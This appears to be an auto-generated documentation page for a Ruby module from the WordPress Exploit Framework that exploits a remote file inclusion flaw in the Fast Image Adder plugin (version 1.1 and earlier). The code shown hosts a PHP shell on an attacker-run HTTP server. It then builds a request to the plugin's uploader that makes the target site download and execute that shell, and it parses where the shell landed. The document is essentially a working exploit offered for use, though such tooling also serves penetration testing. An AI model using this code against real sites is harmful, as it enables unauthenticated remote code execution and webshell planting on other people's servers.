class Wpxf::Exploit::FastImageAdderV11RfiShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 11
def initialize
  super

  update_info(
    name: 'Fast Image Adder <= 1.1 RFI Shell Upload',
    desc: %(
      Fast Image Adder <= 1.1 suffers from a remote file inclusion vulnerability
      which allows unauthenticated users to download and execute a PHP shell
      hosted on a remote server.

      This module will host a HTTP server to serve the payload, and make a request
      to the target that will initiate the download and execution of the payload.
    ),
    author: [
      'Larry W. Cashdollar', # Discovery and disclosure
      'rastating'            # WPXF module
    ],
    references: [
      ['WPVDB', '8092'],
      ['URL', 'http://www.vapid.dhs.org/advisory.php?v=139']
    ],
    date: 'Jul 10 2015'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 50
def check
  check_plugin_version_from_readme('fast-image-adder', '1.2')
end
execute_payload(url) click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 82
def execute_payload(url)
  stop_http_server
  super(url)
end
on_http_request(_path, _params, _headers) click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 66
def on_http_request(_path, _params, _headers)
  payload.encoded
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 78
def payload_body_builder
  Utility::BodyBuilder.new
end
rfi_host() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 54
def rfi_host
  normalized_option_value('rfi_host')
end
rfi_path() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 58
def rfi_path
  normalized_option_value('rfi_path')
end
rfi_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 62
def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
end
run() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 87
def run
  start_http_server true
  super
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 74
def uploaded_payload_location
  upload_result.body[/Uploaded as (.+?)\s/i, 1]
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb, line 70
def uploader_url
  normalize_uri(wordpress_url_plugins, 'fast-image-adder', "fast-image-adder-uploader.php?confirm=url&url=#{url_encode(rfi_url)}")
end